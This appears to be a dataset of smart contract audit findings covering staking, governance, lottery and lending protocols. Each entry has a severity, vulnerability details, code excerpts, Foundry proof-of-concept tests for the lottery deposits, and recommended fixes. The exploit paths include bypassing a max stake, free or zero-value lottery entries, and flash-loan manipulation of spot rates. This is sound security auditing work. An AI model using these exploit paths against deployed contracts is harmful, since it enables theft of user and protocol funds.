`validatorMaxStake` can be bypassed by using `setValidatorAddress()`
medium
`setValidatorAddress()` allows a validator to migrate to a new address of their choice. However, the current logic only stacks up the old address' stake to the new one, never checking `validatorMaxStake`.\\nThe current logic for `setValidatorAddress()` is as follow:\\n```\\nfunction setValidatorAddress(uint128 validatorId, address newAddress) external whenNotPaused {\\n // // rest of code\\n v.stakings[newAddress].shares += v.stakings[msg.sender].shares;\\n v.stakings[newAddress].staked += v.stakings[msg.sender].staked;\\n delete v.stakings[msg.sender];\\n // // rest of code\\n}\\n```\\n\\nThe old address' stake is simply stacked on top of the new address' stake. There are no other checks for this amount, even though the new address may already have contained a stake.\\nThen the combined total of the two stakings may exceed `validatorMaxStake`. This accordingly allows the new (validator) staker's amount to bypass said threshold, breaking an important invariant of the protocol.\\nBob the validator has a self-stake equal to `validatorMaxStake`.\\nBob has another address, B2, with some stake delegated to Bob's validator.\\nBob migrates to B2.\\nBob's stake is stacked on top of B2. B2 becomes the new validator address, but their stake has exceeded `validatorMaxStake`.\\nB2 can then repeated this procedure to addresses B3, B4, ..., despite B2 already holding more than the max allowed amount.\\nBob now holds more stake than he should be able to, allowing him to earn an unfair amount of rewards compared to other validators.\\nWe also note that, even if the admin tries to freeze Bob, he can front-run the freeze with an unstake, since unstakes are not blocked from withdrawing (after cooldown ends).
Check that the new address's total stake does not exceed `validatorMaxStake` before proceeding with the migration.
Breaking an important invariant of the protocol.\\nAllowing any validator to bypass the max stake amount. In turn allows them to earn an unfair amount of validator rewards in the process.\\nAllows a validator to unfairly increase their max delegator amount, as an effect of increasing `(validator stake) * maxCapMultiplier`.
```\\nfunction setValidatorAddress(uint128 validatorId, address newAddress) external whenNotPaused {\\n // // rest of code\\n v.stakings[newAddress].shares += v.stakings[msg.sender].shares;\\n v.stakings[newAddress].staked += v.stakings[msg.sender].staked;\\n delete v.stakings[msg.sender];\\n // // rest of code\\n}\\n```\\n
Nobody can cast for any proposal
medium
```\\nFile: bophades\\src\\external\\governance\\GovernorBravoDelegate.sol\\n function castVoteInternal(\\n address voter,\\n uint256 proposalId,\\n uint8 support\\n ) internal returns (uint256) {\\n// rest of code// rest of code\\n // Get the user's votes at the start of the proposal and at the time of voting. Take the minimum.\\n uint256 originalVotes = gohm.getPriorVotes(voter, proposal.startBlock);\\n446:-> uint256 currentVotes = gohm.getPriorVotes(voter, block.number);\\n uint256 votes = currentVotes > originalVotes ? originalVotes : currentVotes;\\n// rest of code// rest of code\\n }\\n```\\n\\n```\\nfunction getPriorVotes(address account, uint256 blockNumber) external view returns (uint256) {\\n-> require(blockNumber < block.number, "gOHM::getPriorVotes: not yet determined");\\n// rest of code// rest of code\\n }\\n```\\n\\nTherefore, L446 will always revert. Voting will not be possible.\\nCopy the coded POC below to one project from Foundry and run `forge test -vvv` to prove this issue.
```\\nFile: bophades\\src\\external\\governance\\GovernorBravoDelegate.sol\\n uint256 originalVotes = gohm.getPriorVotes(voter, proposal.startBlock);\\n446:- uint256 currentVotes = gohm.getPriorVotes(voter, block.number);\\n446:+ uint256 currentVotes = gohm.getPriorVotes(voter, block.number - 1);\\n uint256 votes = currentVotes > originalVotes ? originalVotes : currentVotes;\\n```\\n\\n
Nobody can cast for any proposal. Not being able to vote means the entire governance contract will be useless. Core functionality is broken.
```\\nFile: bophades\\src\\external\\governance\\GovernorBravoDelegate.sol\\n function castVoteInternal(\\n address voter,\\n uint256 proposalId,\\n uint8 support\\n ) internal returns (uint256) {\\n// rest of code// rest of code\\n // Get the user's votes at the start of the proposal and at the time of voting. Take the minimum.\\n uint256 originalVotes = gohm.getPriorVotes(voter, proposal.startBlock);\\n446:-> uint256 currentVotes = gohm.getPriorVotes(voter, block.number);\\n uint256 votes = currentVotes > originalVotes ? originalVotes : currentVotes;\\n// rest of code// rest of code\\n }\\n```\\n
User can get free entries if the price of any whitelisted ERC20 token is greater than the round's `valuePerEntry`
high
Lack of explicit separation between ERC20 and ERC721 deposits allows users to gain free entries for any round given there exists a whitelisted ERC20 token with price greater than the round's `valuePerEntry`.\\n```\\n if (isCurrencyAllowed[tokenAddress] != 1) {\\n revert InvalidCollection();\\n }\\n```\\n\\n```\\n if (singleDeposit.tokenType == YoloV2__TokenType.ERC721) {\\n if (price == 0) {\\n price = _getReservoirPrice(singleDeposit);\\n prices[tokenAddress][roundId] = price;\\n }\\n```\\n\\n```\\n uint256 entriesCount = price / round.valuePerEntry;\\n if (entriesCount == 0) {\\n revert InvalidValue();\\n }\\n```\\n\\n```\\n } else if (tokenType == TokenType.ERC721) {\\n for (uint256 j; j < itemIdsLengthForSingleCollection; ) {\\n // rest of code\\n _executeERC721TransferFrom(items[i].tokenAddress, from, to, itemIds[j]);\\n```\\n\\n```\\n function _executeERC721TransferFrom(address collection, address from, address to, uint256 tokenId) internal {\\n // rest of code\\n (bool status, ) = collection.call(abi.encodeCall(IERC721.transferFrom, (from, to, tokenId)));\\n // rest of code\\n }\\n```\\n\\nThe function signature of `transferFrom` for ERC721 and ERC20 is identical, so this will call `transferFrom` on the ERC20 contract with `amount = 0` (since 'token ids' specified in `singleDeposit.tokenIdsOrAmounts` are all 0). Consequently, the user pays nothing and the transaction executes successfully (as long as the ERC20 token does not revert on zero transfers).\\nPaste the test below into `Yolo.deposit.t.sol` with `forge-std/console.sol` imported. It demonstrates a user making 3 free deposits (in the same transaction) using the MKR token (ie. with zero MKR balance). The token used can be substituted with any token with price > `valuePerEntry = 0.01 ETH` (which is non-rebasing/non-taxable and has sufficient liquidity in their /ETH Uniswap v3 pool as specified in the README).\\n
Whitelist tokens using both the token address and the token type (ERC20/ERC721).
Users can get an arbitrary number of entries into rounds for free (which should generally allow them to significantly increase their chances of winning). In the case the winner is a free depositor, they will end up with the same profit as if they participated normally since they have to pay the fee over the total value of the deposits (which includes the price of their free deposits). If the winner is an honest depositor, they still have to pay the full fee including the free entries, but they are unable to claim the value for the free entries (since the `tokenId` (or amount) is zero). They earn less profit than if everyone had participated honestly.
```\\n if (isCurrencyAllowed[tokenAddress] != 1) {\\n revert InvalidCollection();\\n }\\n```\\n
Users can deposit "0" ether to any round
high
The main invariant to determine the winner is that the indexes must be in ascending order with no repetitions. Therefore, depositing "0" is strictly prohibited as it does not increase the index. However, there is a method by which a user can easily deposit "0" ether to any round without any extra costs than gas.\\nAs stated in the summary, depositing "0" will not increment the entryIndex, leading to a potential issue with the indexes array. This, in turn, may result in an unfair winner selection due to how the upper bound is determined in the array. The relevant code snippet illustrating this behavior is found here.\\nLet's check the following code snippet in the `depositETHIntoMultipleRounds` function\\n```\\nfor (uint256 i; i < numberOfRounds; ++i) {\\n uint256 roundId = _unsafeAdd(startingRoundId, i);\\n Round storage round = rounds[roundId];\\n uint256 roundValuePerEntry = round.valuePerEntry;\\n if (roundValuePerEntry == 0) {\\n (, , roundValuePerEntry) = _writeDataToRound({roundId: roundId, roundValue: 0});\\n }\\n\\n _incrementUserDepositCount(roundId, round);\\n\\n // @review depositAmount can be "0"\\n uint256 depositAmount = amounts[i];\\n\\n // @review 0 % ANY_NUMBER = 0\\n if (depositAmount % roundValuePerEntry != 0) {\\n revert InvalidValue();\\n }\\n uint256 entriesCount = _depositETH(round, roundId, roundValuePerEntry, depositAmount);\\n expectedValue += depositAmount;\\n\\n entriesCounts[i] = entriesCount;\\n }\\n\\n // @review will not fail as long as user deposits normally to 1 round\\n // then he can deposit to any round with "0" amounts\\n if (expectedValue != msg.value) {\\n revert InvalidValue();\\n }\\n```\\n\\nas we can see in the above comments added by me starting with "review" it explains how its possible. As long as user deposits normally to 1 round then he can also deposit "0" amounts to any round because the `expectedValue` will be equal to msg.value.\\nTextual PoC: Assume Alice sends the tx with 1 ether as msg.value and "amounts" array as [1 ether, 0, 0]. first time the loop starts the 1 ether will be correctly evaluated in to the round. When the loop starts the 2nd and 3rd iterations it won't revert because the following code snippet will be "0" and adding 0 to `expectedValue` will not increment to `expectedValue` so the msg.value will be exactly same with the `expectedValue`.\\n```\\nif (depositAmount % roundValuePerEntry != 0) {\\n revert InvalidValue();\\n }\\n```\\n\\nCoded PoC (copy the test to `Yolo.deposit.sol` file and run the test):\\n```\\nfunction test_deposit0ToRounds() external {\\n vm.deal(user2, 1 ether);\\n vm.deal(user3, 1 ether);\\n\\n // @dev first round starts normally\\n vm.prank(user2);\\n yolo.deposit{value: 1 ether}(1, _emptyDepositsCalldata());\\n\\n // @dev user3 will deposit 1 ether to the current round(1) and will deposit\\n // 0,0 to round 2 and round3\\n uint256[] memory amounts = new uint256[](3);\\n amounts[0] = 1 ether;\\n amounts[1] = 0;\\n amounts[2] = 0;\\n vm.prank(user3);\\n yolo.depositETHIntoMultipleRounds{value: 1 ether}(amounts);\\n\\n // @dev check user3 indeed managed to deposit 0 ether to round2\\n IYoloV2.Deposit[] memory deposits = _getDeposits(2);\\n assertEq(deposits.length, 1);\\n IYoloV2.Deposit memory deposit = deposits[0];\\n assertEq(uint8(deposit.tokenType), uint8(IYoloV2.YoloV2__TokenType.ETH));\\n assertEq(deposit.tokenAddress, address(0));\\n assertEq(deposit.tokenId, 0);\\n assertEq(deposit.tokenAmount, 0);\\n assertEq(deposit.depositor, user3);\\n assertFalse(deposit.withdrawn);\\n assertEq(deposit.currentEntryIndex, 0);\\n\\n // @dev check user3 indeed managed to deposit 0 ether to round3\\n deposits = _getDeposits(3);\\n assertEq(deposits.length, 1);\\n deposit = deposits[0];\\n assertEq(uint8(deposit.tokenType), uint8(IYoloV2.YoloV2__TokenType.ETH));\\n assertEq(deposit.tokenAddress, address(0));\\n assertEq(deposit.tokenId, 0);\\n assertEq(deposit.tokenAmount, 0);\\n assertEq(deposit.depositor, user3);\\n assertFalse(deposit.withdrawn);\\n assertEq(deposit.currentEntryIndex, 0);\\n }\\n```\\n
Add the following check inside the depositETHIntoMultipleRounds function\\n```\\nif (depositAmount == 0) {\\n revert InvalidValue();\\n }\\n```\\n
High, since it will alter the games winner selection and it is very cheap to perform the attack.
```\\nfor (uint256 i; i < numberOfRounds; ++i) {\\n uint256 roundId = _unsafeAdd(startingRoundId, i);\\n Round storage round = rounds[roundId];\\n uint256 roundValuePerEntry = round.valuePerEntry;\\n if (roundValuePerEntry == 0) {\\n (, , roundValuePerEntry) = _writeDataToRound({roundId: roundId, roundValue: 0});\\n }\\n\\n _incrementUserDepositCount(roundId, round);\\n\\n // @review depositAmount can be "0"\\n uint256 depositAmount = amounts[i];\\n\\n // @review 0 % ANY_NUMBER = 0\\n if (depositAmount % roundValuePerEntry != 0) {\\n revert InvalidValue();\\n }\\n uint256 entriesCount = _depositETH(round, roundId, roundValuePerEntry, depositAmount);\\n expectedValue += depositAmount;\\n\\n entriesCounts[i] = entriesCount;\\n }\\n\\n // @review will not fail as long as user deposits normally to 1 round\\n // then he can deposit to any round with "0" amounts\\n if (expectedValue != msg.value) {\\n revert InvalidValue();\\n }\\n```\\n
The number of deposits in a round can be larger than MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND
medium
The number of deposits in a round can be larger than MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND, because there is no such check in depositETHIntoMultipleRounds() function or rolloverETH() function.\\ndepositETHIntoMultipleRounds() function is called to deposit ETH into multiple rounds, so it's possible that the number of deposits in both current round and next round is MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND.\\nWhen current round's number of deposits reaches MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND, the round is drawn:\\n```\\n if (\\n _shouldDrawWinner(\\n startingRound.numberOfParticipants,\\n startingRound.maximumNumberOfParticipants,\\n startingRound.deposits.length\\n )\\n ) {\\n _drawWinner(startingRound, startingRoundId);\\n }\\n```\\n\\n_drawWinner() function calls VRF provider to get a random number, when the random number is returned by VRF provider, fulfillRandomWords() function is called to chose the winner and the next round will be started:\\n```\\n _startRound({_roundsCount: roundId});\\n```\\n\\nIf the next round's deposit number is also MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND, _startRound() function may also draw the next round as well, so it seems that there is no chance the the number of deposits in a round can become larger than MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND:\\n```\\n if (\\n !paused() &&\\n _shouldDrawWinner(numberOfParticipants, round.maximumNumberOfParticipants, round.deposits.length)\\n ) {\\n _drawWinner(round, roundId);\\n }\\n```\\n\\nHowever, _startRound() function will draw the round only if the protocol is not paused. Imagine the following scenario:\\nThe deposit number in `round 1` and `round 2` is MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND;\\n`round 1` is drawn, before random number is sent back by VRF provider, the protocol is paused by the admin for some reason;\\nRandom number is returned and fulfillRandomWords() function is called to start round 2;\\nBecause protocol is paused, `round 2` is set to OPEN but not drawn;\\nLater admin unpauses the protocol, before drawWinner() function can be called, some users may deposit more funds into `round 2` by calling depositETHIntoMultipleRounds() function or rolloverETH() function, this will make the deposit number of `round 2` larger than MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND.\\nPlease run the test code to verify:\\n```\\n function test_audit_deposit_more_than_max() public {\\n address alice = makeAddr("Alice");\\n address bob = makeAddr("Bob");\\n\\n vm.deal(alice, 2 ether);\\n vm.deal(bob, 2 ether);\\n\\n uint256[] memory amounts = new uint256[](2);\\n amounts[0] = 0.01 ether;\\n amounts[1] = 0.01 ether;\\n\\n // Users deposit to make the deposit number equals to MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND in both rounds\\n uint256 MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND = 100;\\n for (uint i; i < MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND / 2; ++i) {\\n vm.prank(alice);\\n yolo.depositETHIntoMultipleRounds{value: 0.02 ether}(amounts);\\n\\n vm.prank(bob);\\n yolo.depositETHIntoMultipleRounds{value: 0.02 ether}(amounts);\\n }\\n\\n // owner pause the protocol before random word returned\\n vm.prank(owner);\\n yolo.togglePaused();\\n\\n // random word returned and round 2 is started but not drawn\\n vm.prank(VRF_COORDINATOR);\\n uint256[] memory randomWords = new uint256[](1);\\n uint256 randomWord = 123;\\n randomWords[0] = randomWord;\\n yolo.rawFulfillRandomWords(FULFILL_RANDOM_WORDS_REQUEST_ID, randomWords);\\n\\n // owner unpause the protocol\\n vm.prank(owner);\\n yolo.togglePaused();\\n\\n // User deposits into round 2\\n amounts = new uint256[](1);\\n amounts[0] = 0.01 ether;\\n vm.prank(bob);\\n yolo.depositETHIntoMultipleRounds{value: 0.01 ether}(amounts);\\n\\n (\\n ,\\n ,\\n ,\\n ,\\n ,\\n ,\\n ,\\n ,\\n ,\\n YoloV2.Deposit[] memory round2Deposits\\n ) = yolo.getRound(2);\\n\\n // the number of deposits in round 2 is larger than MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND\\n assertEq(round2Deposits.length, MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND + 1);\\n }\\n```\\n
Add check in _depositETH() function which is called by both depositETHIntoMultipleRounds() function and rolloverETH() function to ensure the deposit number cannot be larger than MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND:\\n```\\n uint256 roundDepositCount = round.deposits.length;\\n\\n// Add the line below\\n if (roundDepositCount >= MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND) {\\n// Add the line below\\n revert MaximumNumberOfDepositsReached();\\n// Add the line below\\n }\\n\\n _validateOnePlayerCannotFillUpTheWholeRound(_unsafeAdd(roundDepositCount, 1), round.numberOfParticipants);\\n```\\n
This issue break the invariant that the number of deposits in a round can be larger than MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND.
```\\n if (\\n _shouldDrawWinner(\\n startingRound.numberOfParticipants,\\n startingRound.maximumNumberOfParticipants,\\n startingRound.deposits.length\\n )\\n ) {\\n _drawWinner(startingRound, startingRoundId);\\n }\\n```\\n
Low precision is used when checking spot price deviation
medium
Low precision is used when checking spot price deviation, which might lead to potential manipulation or create the potential for an MEV opportunity due to valuation discrepancy.\\nAssume the following:\\nThe max deviation is set to 1%\\n`nTokenOracleValue` is 1,000,000,000\\n`nTokenSpotValue` is 980,000,001\\n```\\nFile: Constants.sol\\n // Basis for percentages\\n int256 internal constant PERCENTAGE_DECIMALS = 100;\\n```\\n\\n```\\nFile: nTokenCalculations.sol\\n int256 maxValueDeviationPercent = int256(\\n uint256(uint8(nToken.parameters[Constants.MAX_MINT_DEVIATION_LIMIT]))\\n );\\n // Check deviation limit here\\n int256 deviationInPercentage = nTokenOracleValue.sub(nTokenSpotValue).abs()\\n .mul(Constants.PERCENTAGE_DECIMALS).div(nTokenOracleValue);\\n require(deviationInPercentage <= maxValueDeviationPercent, "Over Deviation Limit");\\n```\\n\\nBased on the above formula:\\n```\\nnTokenOracleValue.sub(nTokenSpotValue).abs().mul(Constants.PERCENTAGE_DECIMALS).div(nTokenOracleValue);\\n((nTokenOracleValue - nTokenSpotValue) * Constants.PERCENTAGE_DECIMALS) / nTokenOracleValue\\n((1,000,000,000 - 980,000,001) * 100) / 1,000,000,000\\n(19,999,999 * 100) / 1,000,000,000\\n1,999,999,900 / 1,000,000,000 = 1.9999999 = 1\\n```\\n\\nThe above shows that the oracle and spot values have deviated by 1.99999%, which is close to 2%. However, due to a rounding error, it is rounded down to 1%, and the TX will not revert.
Consider increasing the precision.\\nFor instance, increasing the precision from `Constants.PERCENTAGE_DECIMALS` (100) to 1e8 would have caught the issue mentioned earlier in the report even after the rounding down.\\n```\\nnTokenOracleValue.sub(nTokenSpotValue).abs().mul(1e8).div(nTokenOracleValue);\\n((nTokenOracleValue - nTokenSpotValue) * 1e8) / nTokenOracleValue\\n((1,000,000,000 - 980,000,001) * 1e8) / 1,000,000,000\\n(19,999,999 * 1e8) / 1,000,000,000 = 1999999.9 = 1999999\\n```\\n\\n1% of 1e8 = 1000000\\n```\\nrequire(deviationInPercentage <= maxValueDeviationPercent, "Over Deviation Limit")\\nrequire(1999999 <= 1000000, "Over Deviation Limit") => Revert\\n```\\n
The purpose of the deviation check is to ensure that the spot market value is not manipulated. If the deviation check is not accurate, it might lead to potential manipulation or create the potential for an MEV opportunity due to valuation discrepancy.
```\\nFile: Constants.sol\\n // Basis for percentages\\n int256 internal constant PERCENTAGE_DECIMALS = 100;\\n```\\n
The use of spot data when discounting is subjected to manipulation
medium
The use of spot data when discounting is subjected to manipulation. As a result, malicious users could receive more cash than expected during redemption by performing manipulation. Since this is a zero-sum, the attacker's gain is the protocol loss.\\nWhen redeeming wfCash before maturity, the `_sellfCash` function will be executed.\\nAssume that there is insufficient fCash left on the wrapper to be sold back to the Notional AMM. In this case, the `getPrincipalFromfCashBorrow` view function will be used to calculate the number of prime cash to be withdrawn for a given fCash amount and sent to the users.\\nNote that the `getPrincipalFromfCashBorrow` view function uses the spot data (spot interest rate, spot utilization, spot totalSupply/totalDebt, etc.) internally when computing the prime cash to be withdrawn for a given fCash. Thus, it is subjected to manipulation.\\n```\\nFile: wfCashLogic.sol\\n /// @dev Sells an fCash share back on the Notional AMM\\n function _sellfCash(\\n address receiver,\\n uint256 fCashToSell,\\n uint32 maxImpliedRate\\n ) private returns (uint256 tokensTransferred) {\\n (IERC20 token, bool isETH) = getToken(true); \\n uint256 balanceBefore = isETH ? WETH.balanceOf(address(this)) : token.balanceOf(address(this)); \\n uint16 currencyId = getCurrencyId(); \\n\\n (uint256 initialCashBalance, uint256 fCashBalance) = getBalances(); \\n bool hasInsufficientfCash = fCashBalance < fCashToSell; \\n\\n uint256 primeCashToWithdraw; \\n if (hasInsufficientfCash) {\\n // If there is insufficient fCash, calculate how much prime cash would be purchased if the\\n // given fCash amount would be sold and that will be how much the wrapper will withdraw and\\n // send to the receiver. Since fCash always sells at a discount to underlying prior to maturity,\\n // the wrapper is guaranteed to have sufficient cash to send to the account.\\n (/* */, primeCashToWithdraw, /* */, /* */) = NotionalV2.getPrincipalFromfCashBorrow( \\n currencyId,\\n fCashToSell, \\n getMaturity(),\\n 0, \\n block.timestamp\\n ); \\n // If this is zero then it signifies that the trade will fail.\\n require(primeCashToWithdraw > 0, "Redeem Failed"); \\n\\n // Re-write the fCash to sell to the entire fCash balance.\\n fCashToSell = fCashBalance;\\n }\\n```\\n\\nWithin the `CalculationViews.getPrincipalFromfCashBorrow` view function, it will rely on the `InterestRateCurve.calculatefCashTrade` function to compute the cash to be returned based on the current interest rate model.\\nAssume that the current utilization rate is slightly above Kink 1. When Bob redeems his wfCash, the interest rate used falls within the gentle slope between Kink 1 and Kink 2. Let the interest rate based on current utilization be 4%. The amount of fCash will be discounted back with 4% interest rate to find out the cash value (present value) and the returned value is $x$.\\nObserved that before Kink 1, the interest rate changed sharply. If one could nudge the utilization toward the left (toward zero) and cause the utilization to fall between Kink 0 and Kink 1, the interest rate would fall sharply. Since the utilization is computed as on `utilization = totalfCash/totalCashUnderlying`, one could deposit prime cash to the market to increase the denominator (totalCashUnderlying) to bring down the utilization rate.\\nBob deposits a specific amount of prime cash (either by its own funds or flash-loan) to reduce the utilization rate, which results in a reduction in interest rate. Assume that the interest rate reduces to 1.5%. The amount of fCash will be discounted with a lower interest rate of 1.5%, which will result in higher cash value, and the returned value/received cash is $y$.\\n$y > x$. So Bob received $y - x$ more cash compared to if he had not performed the manipulation. Since this is a zero-sum, Bob's gain is the protocol loss.\\n
Avoid using spot data when computing the amount of assets that the user is entitled to during redemption. Consider using a TWAP/Time-lagged oracle to guard against potential manipulation.
Malicious users could receive more cash than expected during redemption by performing manipulation. Since this is a zero-sum, the attacker's gain is the protocol loss.
```\\nFile: wfCashLogic.sol\\n /// @dev Sells an fCash share back on the Notional AMM\\n function _sellfCash(\\n address receiver,\\n uint256 fCashToSell,\\n uint32 maxImpliedRate\\n ) private returns (uint256 tokensTransferred) {\\n (IERC20 token, bool isETH) = getToken(true); \\n uint256 balanceBefore = isETH ? WETH.balanceOf(address(this)) : token.balanceOf(address(this)); \\n uint16 currencyId = getCurrencyId(); \\n\\n (uint256 initialCashBalance, uint256 fCashBalance) = getBalances(); \\n bool hasInsufficientfCash = fCashBalance < fCashToSell; \\n\\n uint256 primeCashToWithdraw; \\n if (hasInsufficientfCash) {\\n // If there is insufficient fCash, calculate how much prime cash would be purchased if the\\n // given fCash amount would be sold and that will be how much the wrapper will withdraw and\\n // send to the receiver. Since fCash always sells at a discount to underlying prior to maturity,\\n // the wrapper is guaranteed to have sufficient cash to send to the account.\\n (/* */, primeCashToWithdraw, /* */, /* */) = NotionalV2.getPrincipalFromfCashBorrow( \\n currencyId,\\n fCashToSell, \\n getMaturity(),\\n 0, \\n block.timestamp\\n ); \\n // If this is zero then it signifies that the trade will fail.\\n require(primeCashToWithdraw > 0, "Redeem Failed"); \\n\\n // Re-write the fCash to sell to the entire fCash balance.\\n fCashToSell = fCashBalance;\\n }\\n```\\n
External lending can exceed the threshold
medium
Due to an incorrect calculation of the max lending amount, external lending can exceed the external withdrawal threshold. If this restriction/threshold is not adhered to, users or various core functionalities within the protocol will have issues redeeming or withdrawing their prime cash.\\nThe following is the extract from the Audit Scope Documentation provided by the protocol team on the contest page that describes the external withdraw threshold:\\n● External Withdraw Threshold: ensures that Notional has sufficient liquidity to withdraw from an external lending market. If Notional has 1000 units of underlying lent out on Aave, it requires 1000 * externalWithdrawThreshold units of underlying to be available on Aave for withdraw. This ensures there is sufficient buffer to process the redemption of Notional funds. If available liquidity on Aave begins to drop due to increased utilization, Notional will automatically begin to withdraw its funds from Aave to ensure that they are available for withdrawal on Notional itself.\\nTo ensure the redeemability of Notional's funds on external lending markets, Notional requires there to be redeemable funds on the external lending market that are a multiple of the funds that Notional has lent on that market itself.\\nAssume that the `externalWithdrawThreshold` is 200% and the underlying is USDC. Therefore, `PERCENTAGE_DECIMALS/externalWithdrawThreshold = 100/200 = 0.5` (Line 83-84 below). This means that the number of USDC to be available on AAVE for withdrawal must be two (2) times the number of USDC Notional lent out on AAVE (A multiple of 2).\\nThe `externalUnderlyingAvailableForWithdraw` stores the number of liquidity in USDC on the AAVE pool available to be withdrawn.\\nIf `externalUnderlyingAvailableForWithdraw` is 1000 USDC and `currentExternalUnderlyingLend` is 400 USDC, this means that the remaining 600 USDC liquidity on the AAVE pool is not owned by Notional.\\nThe `maxExternalUnderlyingLend` will be `600 * 0.5 = 300`. Thus, the maximum amount that Notional can lend externally at this point is 300 USDC.\\nAssume that after Notional has lent 300 USDC externally to the AAVE pool.\\nThe `currentExternalUnderlyingLend` will become `400+300=700`, and the `externalUnderlyingAvailableForWithdraw` will become `1000+300=1300`\\nFollowing is the percentage of USDC in AAVE that belong to Notional\\n```\\n700/1300 = 0.5384615385 (53%).\\n```\\n\\nAt this point, the invariant is broken as the number of USDC to be available on AAVE for withdrawal is less than two (2) times the number of USDC lent out on AAVE after the lending.\\n```\\nFile: ExternalLending.sol\\n function getTargetExternalLendingAmount(\\n..SNIP..\\n uint256 maxExternalUnderlyingLend;\\n if (oracleData.currentExternalUnderlyingLend < oracleData.externalUnderlyingAvailableForWithdraw) {\\n maxExternalUnderlyingLend =\\n (oracleData.externalUnderlyingAvailableForWithdraw - oracleData.currentExternalUnderlyingLend)\\n .mul(uint256(Constants.PERCENTAGE_DECIMALS))\\n .div(rebalancingTargetData.externalWithdrawThreshold);\\n } else {\\n maxExternalUnderlyingLend = 0;\\n }\\n```\\n\\nThe root cause is that when USDC is deposited to AAVE to get aUSDC, the total USDC in the pool increases. Therefore, using the current amount of USDC in the pool to determine the maximum deposit amount is not an accurate measure of liquidity risk.
To ensure that a deposit does not exceed the threshold, the following formula should be used to determine the maximum deposit amount:\\nLet's denote:\\n$T$ as the externalWithdrawThreshold $L$ as the currentExternalUnderlyingLend $W$ as the externalUnderlyingAvailableForWithdraw $D$ as the Deposit (the variable we want to solve for)\\n$$ T = \\frac{L + D}{W + D} $$\\nSolving $D$, the formula for calculating the maximum deposit ($D$) is\\n$$ D = \\frac{TW-L}{1-T} $$\\nUsing back the same example in the "Vulnerability Detail" section.\\nThe maximum deposit amount is as follows:\\n```\\nD = (TW - L) / (1 - T)\\nD = (0.5 * 1000 - 400) / (1 - 0.5)\\nD = (500 - 400) / 0.5 = 200\\n```\\n\\nIf 200 USDC is lent out, it will still not exceed the threshold of 200%, which demonstrates that the formula is working as intended in keeping the multiple of two (200%) constant before and after the deposit.\\n```\\n(400 + 200) / (1000 + 200) = 0.5\\n```\\n
To ensure the redeemability of Notional's funds on external lending markets, Notional requires there to be redeemable funds on the external lending market that are a multiple of the funds that Notional has lent on that market itself.\\nIf this restriction is not adhered to, users or various core functionalities within the protocol will have issues redeeming or withdrawing their prime cash. For instance, users might not be able to withdraw their assets from the protocol due to insufficient liquidity, or liquidation cannot be carried out due to lack of liquidity, resulting in bad debt accumulating within the protocol and negatively affecting the protocol's solvency.
```\\n700/1300 = 0.5384615385 (53%).\\n```\\n
Rebalance will be delayed due to revert
medium
The rebalancing of unhealthy currencies will be delayed due to a revert, resulting in an excess of liquidity being lent out in the external market. This might affect the liquidity of the protocol, potentially resulting in withdrawal or liquidation having issues executed due to insufficient liquidity.\\nAssume that Notional supports 5 currencies ($A, B, C, D, E$), and the Gelato bot is configured to call the `checkRebalance` function every 30 minutes.\\nAssume that the current market condition is volatile. Thus, the inflow and outflow of assets to Notional, utilization rate, and available liquidity at AAVE change frequently. As a result, the target amount that should be externally lent out also changes frequently since the computation of this value relies on the spot market information.\\nAt T1, when the Gelato bot calls the `checkRebalance()` view function, it returns that currencies $A$, $B$, and $C$ are unhealthy and need to be rebalanced.\\nShortly after receiving the execution payload from the `checkRebalance()`, the bot submits the rebalancing TX to the mempool for execution at T2.\\nWhen the rebalancing TX is executed at T3, one of the currencies (Currency $A$) becomes healthy. As a result, the require check at Line 326 will revert and the entire rebalancing transaction will be cancelled. Thus, currencies $B$ and $C$ that are still unhealthy at this point will not be rebalanced.\\nIf this issue occurs frequently or repeatedly over a period of time, the rebalancing of unhealthy currencies will be delayed.\\n```\\nFile: TreasuryAction.sol\\n function _rebalanceCurrency(uint16 currencyId, bool useCooldownCheck) private { \\n RebalancingContextStorage memory context = LibStorage.getRebalancingContext()[currencyId]; \\n // Accrues interest up to the current block before any rebalancing is executed\\n IPrimeCashHoldingsOracle oracle = PrimeCashExchangeRate.getPrimeCashHoldingsOracle(currencyId); \\n PrimeRate memory pr = PrimeRateLib.buildPrimeRateStateful(currencyId); \\n\\n bool hasCooldownPassed = _hasCooldownPassed(context); \\n (bool isExternalLendingUnhealthy, OracleData memory oracleData, uint256 targetAmount) = \\n _isExternalLendingUnhealthy(currencyId, oracle, pr); \\n\\n // Cooldown check is bypassed when the owner updates the rebalancing targets\\n if (useCooldownCheck) require(hasCooldownPassed || isExternalLendingUnhealthy); \\n```\\n
If one of the currencies becomes healthy when the rebalance TX is executed, consider skipping this currency and move on to execute the rebalance on the rest of the currencies that are still unhealthy.\\n```\\nfunction _rebalanceCurrency(uint16 currencyId, bool useCooldownCheck) private { \\n RebalancingContextStorage memory context = LibStorage.getRebalancingContext()[currencyId]; \\n // Accrues interest up to the current block before any rebalancing is executed\\n IPrimeCashHoldingsOracle oracle = PrimeCashExchangeRate.getPrimeCashHoldingsOracle(currencyId); \\n PrimeRate memory pr = PrimeRateLib.buildPrimeRateStateful(currencyId); \\n\\n bool hasCooldownPassed = _hasCooldownPassed(context); \\n (bool isExternalLendingUnhealthy, OracleData memory oracleData, uint256 targetAmount) = \\n _isExternalLendingUnhealthy(currencyId, oracle, pr); \\n\\n // Cooldown check is bypassed when the owner updates the rebalancing targets\\n// Remove the line below\\n if (useCooldownCheck) require(hasCooldownPassed || isExternalLendingUnhealthy);\\n// Add the line below\\n if (useCooldownCheck && !hasCooldownPassed && !isExternalLendingUnhealthy) return;\\n```\\n
